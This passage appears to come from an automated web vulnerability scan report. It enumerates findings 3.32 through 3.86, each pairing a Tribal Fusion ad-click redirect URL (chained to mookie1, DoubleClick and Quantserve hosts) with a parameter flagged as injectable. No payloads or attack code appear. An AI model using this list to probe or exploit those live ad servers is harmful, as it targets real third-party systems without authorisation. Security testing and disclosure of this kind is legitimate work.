3.32. http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r [name of an arbitrarily supplied request parameter]

3.33. http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r [vehicle parameter]

3.34. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [;ord parameter]

3.35. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 10]

3.36. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 11]

3.37. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 12]

3.38. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 13]

3.39. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 14]

3.40. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 15]

3.41. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 16]

3.42. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 17]

3.43. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 18]

3.44. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 19]

3.45. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 3]

3.46. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 4]

3.47. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 5]

3.48. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 6]

3.49. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 7]

3.50. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 8]

3.51. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 9]

3.52. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [http://ad.doubleclick.net/jump/N3740.270604.B3/B5112048;abr parameter]

3.53. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [name of an arbitrarily supplied request parameter]

3.54. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/ [7987e parameter]

3.55. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/ [name of an arbitrarily supplied request parameter]

3.56. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/ [ord parameter]

3.57. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6 [REST URL parameter 3]

3.58. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6 [REST URL parameter 4]

3.59. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6 [REST URL parameter 5]

3.60. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6 [REST URL parameter 6]

3.61. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6 [REST URL parameter 7]

3.62. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6 [name of an arbitrarily supplied request parameter]

3.63. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6 [sz parameter]

3.64. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [REST URL parameter 3]

3.65. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [REST URL parameter 4]

3.66. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [REST URL parameter 5]

3.67. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [REST URL parameter 6]

3.68. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [REST URL parameter 7]

3.69. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [adID parameter]

3.70. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [cs:a:e parameter]

3.71. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [cs:e parameter]

3.72. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [cs:pro parameter]

3.73. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [migAgencyId parameter]

3.74. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [migRandom parameter]

3.75. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [migSource parameter]

3.76. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [migTrackDataExt parameter]

3.77. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [migTrackFmtExt parameter]

3.78. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [migUnencodedDest parameter]

3.79. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [name of an arbitrarily supplied request parameter]

3.80. http://a.tribalfusion.com/h.click/aUmNQC5EY73tyM4A7JnUbZbYGvUXc3XXGnwmaZbU5U3QVUFHWP72PT33QcYpSdUM0dBsVmrp2cYVYrYATPys4AZbgQPMF4WUn0dBKpdZay3PvY4Vb7VcQdVsMeSPYyUWY3Ur7S3UaoVEYpTTBaPE3JQcjKQUIoPH7WnHRP4p/ [name of an arbitrarily supplied request parameter]

3.81. http://a.tribalfusion.com/h.click/aUmNQC5EY73tyM4A7JnUbZbYGvUXc3XXGnwmaZbU5U3QVUFHWP72PT33QcYpSdUM0dBsVmrp2cYVYrYATPys4AZbgQPMF4WUn0dBKpdZay3PvY4Vb7VcQdVsMeSPYyUWY3Ur7S3UaoVEYpTTBaPE3JQcjKQUIoPH7WnHRP4p/ [ord parameter]

3.82. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [;ord parameter]

3.83. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 10]

3.84. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 11]

3.85. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 12]

3.86. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 13]

